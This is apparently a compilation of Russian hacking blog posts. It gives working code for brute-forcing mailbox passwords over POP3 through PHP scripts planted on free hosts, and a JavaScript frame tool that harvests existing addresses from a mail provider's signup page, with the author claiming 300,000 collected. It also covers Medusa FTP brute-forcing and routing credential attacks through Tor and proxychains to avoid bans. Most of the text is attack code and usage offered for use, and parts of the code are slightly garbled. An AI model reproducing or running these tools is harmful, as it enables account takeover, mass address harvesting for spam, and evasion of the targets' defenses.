Пишу эту заметку больше для себя, чтобы запомнить, что из репозитариев ее ставить не надо.

Устанавливать ее надо только из тарболов т.к. при установке через yum неправильно прописываются пути к модулям, в результате чего при запуске возникает такая ошибка:

$ medusa -M ftp -h superdomen.com -U users -P pass.dic
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

IMPORTANT: Couldn't load "ftp" [/usr/lib/medusa/modules/ftp.mod: cannot open shared object file: No such file or directory]. Place the module in the medusa directory, set the MEDUSA_MODULE_NAME environment variable or run the configure script again using --with-default-mod-path=[path].
invokeModule failed - see previous errors for an explanation

А в результате проверки доступных модулей увидим это:

$ medusa -d
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

Available modules in "." :

Available modules in "/usr/lib/medusa/modules" :
Couldn't open directory "/usr/lib/medusa/modules"

установка

1. качаем тарбол с оффсайта, для последней на данный момент версии 2.0 это http://www.foofus.net/~jmk/tools/medusa-2.0.tar.gz
2. ликвидируем зависимости
   
   # yum install -y pcre-devel afpfs-ng-devel ncpfs-devel postgresql-devel libssh2-devel subversion-devel
3. распаковываем и устанавливаем. Я устанавливал под рутом, хотя возможно хватит прав и установить под обычным пользователем.

   # ./configure --with-default-mod-path=/usr/local/lib/medusa/modules/
# make
# make install


4. теперь делаем ссылку, опять же если хватит прав, то можно и не под root’ом
   
   # ln /usr/local/bin/medusa /usr/bin/medusa

Документацию по использованию смотрите на оффсайте, для примера покажу брут FTP:

medusa -M ftp -U users -P passwd.dic -h domen-or-ip.com

где users – файл со списком пользователей, passwd.dic – файл со списком паролей, domen-or-ip.com – домен или IP-адрес атакуемого сервера.

Раздел математики под названием Комбинаторика по этому поводу говорит, что количество таких комбинаций с повторами будет равно N^m, где N – размер алфавита, а m – максимальное количество символов в комбинации(слове).
И комбинаторика действительно не врет, в этом можно легко убедится напримере:
A={1,0} => N=2
m=3

N^m=2³=8. Что и требовалось доказать.

Посчитать-то количество мы смогли, а вот конкретно найти все возможные варианты нам поможет следующий скрипт.

Сначала зададим алфавит и максимальное количество символов в слове:

alf=['a','l','f','v','i','t']
max_size=5

Теперь немного объясню принцип.

Он такой же как и был на примере, где убеждались в правоте комбинаторики. Короче, мы ставим нашему алфавиту в соответсвие цифру из системы счисления равной длине алфавита. В нашем случае это будет шестиричная система счисления. Далее мы просто будем инкрементно крутить какую-то переменную скажем i т.е. будем в цикле прибавлять к i единицу.

Но для начала нам нужно посчитать сколько нужно шагов в цикле, чтобы длина слова соответствовала max_size.

res=alf.size**max_size

Тупо пользуемся этой самой формулой из комбинаторики.

А теперь также тупо будем инкрементно крутить в цикле переменную i и обратно ставить в соответсвие каждой цифре числа символ из алфавита:

for i in 2..res+1 do
str=”
i.to_s(alf.size).scan(/./).each {|x| str+=alf[x.to_i]}
puts “#{i} – #{i.to_s(7)} – #{str}”
end

Весь приведенный здесь код написан на Ruby.

Я закончил, а теперь каждый случайно заглянувший сюда великий математик или программист может плюнуть в монитор, написать отрицательный коммент и просебя матернутся: мол это и ежу понятно, мол существуют гораздо менее ресурсотребовательные способы итд.

Ниже я покажу как можно бесплатно (обычные брутфорсы обычно работают через прокси/соксы, которые либо бесплатные и очень долгие, либо платные) и главное быстро перебирать пароли к ящикам.
Моя первоначальная идея состояла в организации злой бот-сети из фрихостов, но об этом я расскажу в другой статье, пока лишь ограничимся одной функцией бота – попытка авторизации на POP3-сервере.

Итак, для начала нам нужен какой-нибудь бесплатный хостинг с поддержкой PHP5, версия должна быть именно пятая, в противном случае придется немного переписать серверные скрипты.
Допустим вы нашли фрихостинг, коих сейчас немерянно, и можно приступать к самому приложению, которое будет представляеть из себя многопоточный брутфорс списка мыл на популярные пароли. Если кому-то нужно иначе, клиентскую часть легко переписать на свой лад.

Брутфорс будет состоять из 2-х частей:

1. серверная – PHP-скрипты, которые будут по запросу клиента пытатся авторизоватся с заданным логином и паролем
2. клиентская – Ruby-скрипты, которые будут давать запрос, с указанием логина и пароля, по которым необходимо авторизоватся

Сервер (PHP-скрипты).

Сервер будет состоять из 3-х файлов:

1. библиотека – lib.php
2. конфигурация – config.php
3. сам скрипт авторизации – brut.php

В библиотеки lib.php содержится класс Email, который через функцию fsockopen() будет общатся с POP3-сервером. Взят именно такой принцип, а не скажем уже готовая mail() т.к. на более-менее нормальных хостингах подобные штуки отключены, запрещены и являются признаком преступления против человечества.

Итак, сам lib.php:

<?php
class Email {
var $server;
var $full_addr;
var $login;
const SOCK_ERR=-3;
const FST_GET_ERR=-2;
const LOGIN_ERR=-1;
const INCCORECT_PASS=0;
const SUCC=1;

function __construct($addr)
{$this->full_addr=$addr;
$this->set_serv();
$this->set_login(); }

private function set_serv ()
{$strpos=strpos($this->full_addr,’@');
$this->server=”pop.” . substr($this->full_addr,$strpos+1,strlen($this->full_addr)-$strpos); }

private function set_login ()
{$this->login=substr($this->full_addr,0,strpos($this->full_addr,’@')); }

public function try_auth ($pass)
{ $pop_conn = fsockopen($this->server, 110,$errno, $errstr, 10);
if (!(is_resource($pop_conn))) return -3;

$ans=fgets($pop_conn,1024);
if (!(substr_count($ans,”OK”)))    return -2;

fputs($pop_conn,”USER $this->login\r\n”);
$ans=fgets($pop_conn,1024);
if (!(substr_count($ans,”OK”)))    return -1;

fputs($pop_conn,”PASS $pass\r\n”);
$ans=fgets($pop_conn,1024);
if (!(substr_count($ans,”OK”)))return 0;

fclose($pop_conn);
return 1;
}
}
?>

Далее файл config.php, он не отличается сложностью и представляет из себя 2 переменные хранящие логин и пароль админа брутфорса, мы же хотим единолично пользоватся нашим брутом.

<?php
$login=”root”;
$pass=”jvgfdhg6hj”;
?>

Теперь перейдем к brut.php, который и будет промежуточным звеном между нашей клиентской частью и POP3-сервером.

<?php
include ‘lib.php’;
include ‘config.php’;

if (!isset($_POST['login']) || $_POST['login']!=$login) die();
if (!isset($_POST['pass']) || $_POST['pass']!=$pass) die();
if (!(isset($_POST['op_addr'])) || !(isset($_POST['op_pass']))) die();

$email= new Email($_POST['op_addr']);
echo ‘<ans>’.$email->try_auth($_POST['op_pass']).’</ans>’;
?>

brut.php тоже не является верхом сложности программирования на PHP: сначала мы проверяем логин и пароль админа, затем смотрим присутствуют ли адрес почты и предполагаемый пароль к ней, и в случае если все ништяк пробуем авторизоватся, посредством заранее написанного класса. В конце мы выводим числовой ответ. Тот кому нужны точные ответы  посмотрит lib.php, а я же скажу что 0 – пароль не подошел, 1 – пароль подошел.

На этом с серверной частью закончили, теперь берем эти 3 файла и заливаем на все фрихосты, где удалось зарегать.

Клиент (Ruby-скрипты).

Клиентская часть состоит из 2-х скриптов:

1. config.rb – файл конфигурации
2. main.rb – собственно сам клиент

Сначала рассмотрим кофиг. Представляет он из себя следующее:

#!/usr/bin/ruby

$servers=['lukmus.ru','second.server.ru','third.server.ru','etc.freehost.com']
$path=’/mailbrut/brut.php’

$login=”root”
$pass=”jvgfdhg6hj”

$th_count=3

$fl_addrs=”mail_list”
$fl_log=”mailbrut.log”
$fl_good=”good_accs”

$passes=['pass','qwerty','123456','12345','etc...']

Теперь разберемся в нем:

• $servers – здесь пишем наши фризосты
• $path – путь на фрихостинге до нашей серверной части, на всех сайтах должен быть один и тот же
• $login и $pass – пароль админа брута, должен совпадать с указанными в config.php в серверной части
• $th_count – количество потоков брутфорса, он же у нас многопоточный
• $fl_addrs – файл, записаны почтовые адреса которые мы брутим. Каждая запись должна начинатся с новой строки.
• $fl_log – лог, сюда пишутся все ошибки
• $fl_good – здесь будут сохранятся удачно сбрученные почтовые акки в виде login:pass
• $passes – записываем пароли, на которые брутим

А теперь рассмотрим сам скрипт, который будет выдавать запросы нашим хостингам.

main.rb:

#!/usr/bin/ruby
require ‘net/http’
require ‘config.rb’

class WEB_Server
def initialize (servers)
@servers=servers
@i=0
end#def
def next_s
server=@servers[@i]
@i+=1
if @i>=@servers.size then @i=0 end
return server
end#def
end#class

def log(logfl,msg)
mess=”#{Time.now} <-> #{msg}”
logf=File.new(logfl,’a')
logf.puts mess
logf.close
puts mess
end#def

puts “Lukmus PHP-Ruby WebMailBrut starting…”

servers=WEB_Server.new($servers)
accs=File.new($fl_addrs,’r')
while !accs.eof do
op_addr=accs.gets.chop
while Thread.list.size>$th_count do sleep(1) end
th=Thread.new(op_addr) do |p_addr|
$passes.each do |p_pass|
serv=servers.next_s
http = Net::HTTP.new(serv, 80)
data = “login=#{$login}&pass=#{$pass}&op_addr=#{p_addr}&op_pass=#{p_pass}”
headers = { ‘Content-Type’ => ‘application/x-www-form-urlencoded’}
resp, data = http.post($path, data, headers)
ans=data.split(‘<ans>’)[1].split(‘</ans>’)[0]
case ans
when ‘-3′
log($fl_log,”ERR #3 Can’t open socket <-> #{p_addr}:#{p_pass}”)
when ‘-2′
log($fl_log,”ERR #2 Can’t connect to server <-> #{p_addr}:#{p_pass}”)
when ‘-1′
log($fl_log,”ERR #1 Can’t input login <-> #{p_addr}:#{p_pass}”)
when ’0′
puts “#{serv} <-> #{p_addr}:#{p_pass} <-> invalid pass”
when ’1′
log($fl_good,”#{serv} <-> #{p_addr}:#{p_pass} <-> SUCCESS”)
break

end#case
#http.close
end#each
end#thread
end#while
th.join

Он работает по следующему принципу:

• ОСНОВНОЙ ПОТОК: открывает файл со списком адресов и берет первый
• ОСНОВНОЙ ПОТОК: создает поток, который будет работать с этим адресом
• ПОТОК: берет первый пароль из нашего списка
• ПОТОК: берет первый хостинг и посылает запрос серверу на попытку авторизации
• ПОТОК: далее берет следующий хостинг и следующий пароль и так далее
• ОСНОВНОЙ ПОТОК: берет следующее мыло из списка и создает новый поток под него и так далее.

В случае если поток находит правильный пароль, то поток самоуничтожается, тем самым пресекая бессмысленные попытки авторизации с оставшимися, заведомо ложными паролями.

Ну вот и все, как запустить скрипт Ruby можно прочитать здесь, а скачвть все это дело одним архивом можно здесь

Статья является плодом бурной фантазии автора и не призывает ни к каким действиям,
противоречащим законодательству. Ответственность за использование материала ложиться только на вас!
Любые совпадения с реальными людьми считаются случайными.

Способ заключается в следующем: создается примитивная html-страничка, с указанными в ней фреймами (2 и более). Фреймы ссылаються на страницу сайта, которого будем брутить и еще одну нашу страничку, содержащую javascript собственно самого переборщика.

Принцип действия: страница, с javascript’ом, а точнее сам javascript будет подставлять в форму выбранного нами сайта данные для перебора.

Для реализации всего выше указанного, нам необходимо немного соображать в javascript’е, html’е и самое сложное – найти и установить браузер с багом, который позволяет скрипту из одного фрейма обращаться к данным и объектам другого фрейма, где разнофреймовые страницы – ресурсы разных узлов.

Перепробывал следующие браузеры, и ни один из них не удовлетворяет нашим требованиям:
Windows: IE v 4-8, FFox 3/3.5, Opera 10, Google Chrome 3, Seamonkey 2.0b2
Linux: FF 3.5, Opera 10, Epiphany 2.26.3.
Однако, не смотря на неудачи, я все-таки нашел браузер с такой ошибкой, это оказался Arora 0.9.0 под Linux (RH).

Скачать его можно здесь.

Не знаю существует ли он под Windows и есть ли в нем этот баг.

Я решил набрать базу сайта /\/\аi|.ру, используя его следующее свойство:
на странице регистрации, при вводе желаемого логина он сам автоматом говорит занят логин или нет.
Ваша цель может быть любой, от перебора паролей к роутерам, до рассылки писем.

!!!в ссылках необходимо заменить /\/\аi|.ру, а так же имена почтовых доменов и поменять слэши

После того как установили браузер, необходимо написать сами страницы.

Первая, главная страница с разметкой на фреймы:

<html>
<head>
<title>/\/\аi|.ру checker all domains</title>
</head>
<frameset rows=25%,75%>
<frame name=’up’ src=’2.html’>
<frame name=’mid’ src=’http:\\win./\/\аi|.ру\cgi-bin\signup’ >
</frameset>
</html>

Вторая страница 2.html, так называемый интерфейс брутфорса (вопреки вышеуказанному, явакод будет размещен в отдельном файле, а не в файле страницы):

<script type=”text/javascript” src=”latvia.js”></script>
<html>
<body >
<form name=’cmd’ >
<table style=text-allign:center;font-size:70%;vertical-align:middle; >
<td>addresses:<br><textarea name=’alladress’ readOnly=’true’ cols=20 rows=10></textarea> </td>

<td>full number<br>
<textarea name=’nomer’ cols=13 rows=1>0</textarea><br>

<textarea name=’fakt_no’ readOnly=’true’ cols=3 rows=1>0</textarea>^<textarea name=’quantity’ cols=5 rows=1>1500</textarea><br>
exist address count<br>
<textarea name=’ex_count’ readOnly=’true’ cols=3 rows=1>0</textarea><br>
<input type=’button’ name=’start_bt’ value=’start’ onClick=’zamena()’ >
<input type=’button’ name=’update_bt’ value=’update’ onClick=’update_fr()’ >
</td>

<td>words:<br><textarea name=’words’ cols=20 rows=8></textarea><br>
dictionary/successively(0/1)<br>
<textarea name=’dicsuc’ cols=13 rows=1>0</textarea>

</td>

</table>

</form>
</body>
</html>

А теперь сам движок брутфорса, файл с явакодом(latvia.js):

var i=0;
var osnwait=1000;
var loawait=500;
var load_attemp=0;
var max_att=500;
var ex_count=0;
var flag=0;

var dom = new Array();
dom[0]=’@/\/\аi|.ру’;
dom[1]=’@ЬК.ru’;
dom[2]=’@inЬ0х.ru’;
dom[3]=’@|i$t.ru’;
var n_dom=0;

function next(dig,variant) //возвращает следующее слово
{if (variant==0){
word_ar=parent.up.document.cmd.words.value.split(‘  \n’);
return word_ar[dig];} else{
return dig.toString(36);}
}

function oknext() //заменяет домен на следующий (инб0кс/мaил/лиcT/Ьк)
{
if (flag==1){
if (parent.mid.document.uinfo.RegistrationDomain.sele  ctedIndex<3)
{parent.mid.document.uinfo.RegistrationDomain.sele  ctedIndex++;
}else{
parent.mid.document.uinfo.RegistrationDomain.selec  tedIndex=0;
parent.up.document.cmd.nomer.value=parseInt(parent  .up.document.cmd.nomer.value)+1;
i++;
parent.up.document.cmd.fakt_no.value=i;
}}
n_dom=parent.mid.document.uinfo.RegistrationDomain  .selectedIndex;
if (flag==0){
parent.mid.document.getElementById(‘userNameInput’  ).value=’^!@#$%&*’;
setTimeout(“zamena()”,loawait);
flag=1;
} else
{parent.mid.document.getElementById(‘userNameInput  ‘).value=next(parseInt(parent.up.document.cmd.nome  r.value),parseInt(parent.up.document.cmd.dicsuc.va  lue));
load_attemp=0;
if(i<=parseInt(parent.up.document.cmd.quantity.value))s  etTimeout(“zamena()”,osnwait);
flag=0;
}
}

function update_fr() //обновляет страницу с формой
{parent.mid.location=”http://win./\/\аi|.ру\cgi-bin\signup”;
load_attemp=0;
}

function zamena() //проверяет результаты выданные сайтом
{
//Еще проверяет
if(parent.mid.document.getElementById(“checkUser”).innerHTML.length==43){
setTimeout(“zamena()”,loawait);
load_attemp++;
if(load_attemp>max_att)    {
update_fr();
setTimeout(“zamena()”,osnwait*25);
}
}

//Сессия устарела
if(parent.mid.document.getElementById(“checkUser”).innerHTML.length==67){
update_fr();
setTimeout(“zamena()”,osnwait*25);}
//Мыло существует
if(parent.mid.document.getElementById(“checkUser”).innerHTML.length==143){
//alert(“exist”);
parent.up.document.cmd.alladress.value=parent.up.d  ocument.cmd.alladress.value+parent.mid.document.ge  tElementById(‘userNameInput’).value+dom[n_dom]+’\n’;

ex_count++;
parent.up.document.cmd.ex_count.value=ex_count;
oknext();
}
//Логин свободен т.е. мыло не существует
if(parent.mid.document.getElementById(“checkUser”).innerHTML.length==56)oknext();
if(parent.mid.document.getElementById(“checkUser”).innerHTML.length!=56 && parent.mid.document.getElementById(“checkUser”).innerHTML.length!=43 && parent.mid.document.getElementById(“checkUser”).innerHTML.length!=143 && parent.mid.document.getElementById(“checkUser”).innerHTML.length!=67)oknext();
}

Вопросы по коду:
?:зачем между сменами доменов вставлять ^!@#$%&* ?
0: иначе страница не видит что потенциальный логин был изменен, точнее его домен
?:как реализована задержка между вводами ?
0:посредством функции setTimeout() т.к. в яваскрипте нет функции а-ля sleep()
?:по какому принципу скрипт определяет что выдает сайт (Идет проверка/ ящик свободен итд)
0:чтобы не заморачиваться с кодировками он проверяет по длине строки т.е. например для строки ‘идет проверка’ длина = 43

Остальное непонятное станет ясно дальше.

Запуск и настройка:
Открываем в браузере первую страницу и видим примерно следующее:

Пару слов перед настройкой:
этот переборщик может работать в двух режимах: пересчет всего подрят или перебор по словарю, но так как javascript не может читать из локального файла в качестве словаря выступает поле ‘words’.

• Поле ‘addresses’ – здесь будут содержаться существующие адреса т.е. наши успешные попытки

• Поле ‘full number’ – в случае если мы перебираем все возможные комбинации, сюда вбиваем порядковый номер комбинации символов, если по словарю, то номер слова в словаре.

• Поле ниже ‘full number’- первое служит для отображения текущего номера слова/комбинации символов, а во втором задаеться количество слов/комбинаций которые будем перебирать

• Поле ‘exist address count’ – здесь отображаеться количество набранных адресов

• Поле ‘dictionary/successively(0/1)’ – выбор варианта перебора 0 – по словарю, 1 – все подряд

• Поле ‘words’ – наш словарь

• Кнопка ‘start’ – запускает перебор

• Кнопка ‘update’ – обновляет фрейм сайта (использовать только в экстренных ситуациях т.к. скрипт сам обновляет страницу когда надо )

Настройка на перебор всего подряд
начинаем с 1000000 комбинации (full number = 0)
перебор всех комбинаций (dictionary/successively(0/1)=1)
количество = 5000

Настройка на перебор по словарю
начинаем со второго слова в словаре(отсчет идет с нуля) (full number=2)
перебор по словарю (dictionary/successively(0/1)=0)
количество = 10000

Итоги:
Я запускал эту страницу в 10, а иногда в 12-ти вкладках и за 3 дня перебрал несколько миллионов слов, в результате чего набрал базу в чуть больше 300 000 адресов и не разу не был никем забанен.
Важно: скрипт не устойчив к отключению интернета т.е. браузер будет сильно лагать вплоть до зависания если инета не будет больше 5-10 минут и вернуть оттуда набрученное будет очень тяжело, хотя мне удавалось.
Так же не рекомендую кидать в словарь слишком много слов, 10-15 тысяч на вкладку вполне достаточно, и не надо открывать много вкладок – сайт не будет выдавать быстрее инфу, чем его канал позволяет, а нагрузить память браузера можно достаточно серьезно, для стабильной работы необходимо не больше 15 вкладок .
Скачать все эти скрипты можно здесь.

Статья является плодом бурной фантазии автора и не призывает ни к каким действиям,
противоречащим законодательству. Ответственность за использование материала ложиться только на вас!
Любые совпадения с реальными людьми считаются случайными.

1. собственно сам Tor;
2. Privoxy — это свободный веб-прокси с расширенными возможностями фильтрования интернет-контента для защиты конфиденциальности (приватности) пользователей сети Интернет, изменения содержания веб-страниц, управления cookies, ограничения доступа к некоторым сайтам и удаления рекламы, баннеров, всплывающих окон, а также любого другого нежелательного контента («интернет-мусора»);
3. Proxychains – программа, направляющая пакет уровня выше протокола IP, через цепочки заданных proxy(http) или socks(https,smtp,pop3,imap,ftp и др. в стеке протоколов выше IP)

Подробнее о их настройке можете прочитать на их официальных сайтах, в качестве примера, привожу мои настройки:

Tor (/etc/tor/torrc):

1
2
3
4

DataDirectory /var/lib/tor/.tor
NewCircuitPeriod 1
Group toranon
User  toranon

Privoxy (/etc/privoxy/config):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

forward-socks4a / 127.0.0.1:9050 .
confdir /etc/privoxy
logdir /var/log/privoxy
actionsfile standard  # Internal purpose, recommended
actionsfile default   # Main actions file
actionsfile user      # User customizations
filterfile default.filter
debug   4096 # Startup banner and warnings
debug   8192 # Errors - *we highly recommended enabling this*
user-manual /usr/share/doc/privoxy/user-manual
listen-address  127.0.0.1:8118
toggle  1
enable-remote-toggle 0
enable-edit-actions 0
enable-remote-http-toggle 0
buffer-limit 4096

Proxychains (/etc/proxychains.conf):

1
2
3
4
5
6
7
8
9
10

#dynamic_chain
random_chain  #случайный сервер
chain_len = 1 #максимальная длина цепи
tcp_read_time_out 20000
tcp_connect_time_out 20000
#список серверов
socks4 127.0.0.1 9050
socks4 127.0.0.1 9050
socks4 127.0.0.1 9050
socks4 127.0.0.1 9050

Примечание: как бы я не пытался но у меня так и не получилось заставить proxychains выстроить цепь из одного сервера, минимум цепочка состояла из двух, для этого я здесь и указал локальный хост несколько раз. Возникает вопрос: а почему бы тогда не указать его 2 раза; отвечу: для того чтобы сделать брутфорс более стабильным т.к. при обнаружении мертвого сервера (такое возможно с локальным хостом если ОС не даст сокет) proxychains возьмет следующий, так вот чтобы он мог брать 4 раза следуюший а не 2, здесь и написано 4 раза.

Далее я приведу код примитивного брутфорса, который будет состоять из 2-х скриптов:

1. скрипт инициирующий соединение, будет запускаться под tor’ом
2. скрипт инициирующий запуск первого скрипта.

1. На входе просит email-адрес, пароль и файл для удачных комбинаций (try_connect.rb)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

#!/usr/bin/ruby
require 'net/pop'
 
n=ARGV.size
if n!=3
 puts "Not enought arguments\n"
 exit
end
 
login=ARGV[0].split('@')[0]
pop_server='pop.'+ARGV[0].split('@')[1]
paswd, outfile=ARGV[1],ARGV[2]
 
puts "/#{pop_server}/#{login}/#{paswd}/"
invalid=false
begin
  begin
    Net::POP3.auth_only(pop_server, 110,login, paswd)
  rescue Net::POPAuthenticationError
    invalid=true
    puts "FAIL /#{ARGV[0]}/#{ARGV[1]}/  #{Time.now}"
  end
rescue => e
  invalid=true
  puts "#{Time.now} can't connect #{e}"
  #retry
end
 
if invalid==false
  puts "SUCCESS /#{ARGV[0]}/#{ARGV[1]}/  #{Time.now}"
  File.open(outfile,"a") do |sfile|
    sfile.puts "#{Time.now}  #{ARGV[0]}:#{ARGV[1]}"
  end
end

2. На входе просит фаил-список e-mail адресов и файл для удачных комбинаций (get_next.rb)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

#!/usr/bin/ruby

n=ARGV.size
if n<1 or n>2
  puts "Not enought arguments\n  []"
  exit
end
 
infile=ARGV[0]
if n==1 then outfile=infile+'_out' else outfile=ARGV[1] end
 
begin
  file=File.new(infile)
rescue =&gt; e
  puts "Inputfile error:#{e}"
end
 
pass=['yourfirstpass','yoursecondpass','yourthirdpass','  etc']
 
str=''
no=0
while str!=nil
  puts "#{no})"
  str=file.gets
  if str!=nil
    mail=str.to_s.chop!
    pass.each do |paswd|
      puts "proxychains ./try_connect.rb #{mail} #{paswd}"+
      "#{outfile}"
      system("proxychains ./try_connect.rb #{mail} #{paswd}"+
      "#{outfile}")
      sleep(3) #интервал между запросами
    end#each
  end#if
  no+=1
end#while
file.close

Теперь рассмотрим прицип работы:

1. скрипт get_next.rb берет из списка email и дает команду интерпритатору bash: ‘proxychains ./try_connect.rb #{mail} #{paswd} #{outfile}’
2. bash запускает proxychains
3. proxychains запускает try_connect.rb под своим прикрытием т.е. пакет идет на локальный прокси/сокс privoxy, который в свою очередь доверяет маршрутизацию пакета сети Tor, который предусмотрительно меняет свои сервера (в этом можно убедиться запустив браузер под tor’ом, где обновлять страницу скажем 2ip.ru)
4. по выше приведенному пути try_connect.rb ведет диалог с pop3-сервером поповоду авторизации

Использовать связку tor-privoxy-proxychains можно для любого брутфорса, работающего на протоколах выше IP, по-мойму кроме ICMP, тем самым можно не писать нудные процедуры посылки пакета через прокси, а написав примитивный брутфорс запускать его под этой связкой.

Примечание: все выше указанное ПО, в том числе скрипты, тестировались только под ОС Linux, однако на офсайтах privoxy,tor и proxychains заявленно что существуют версии и для Windows и для Mac. Приведенные здесь скрипты написанны на Ruby, который в свою очередь тоже являеться кроссплатформенным.
Увеличить скорость работы приведенных скриптов можно добавив многопоточность.

Статья является плодом бурной фантазии автора и не призывает
ни к каким действиям, противоречащим законодательству.
Ответственность за использование материала ложиться только
на вас! Любые совпадения с реальными людьми считаются
случайными.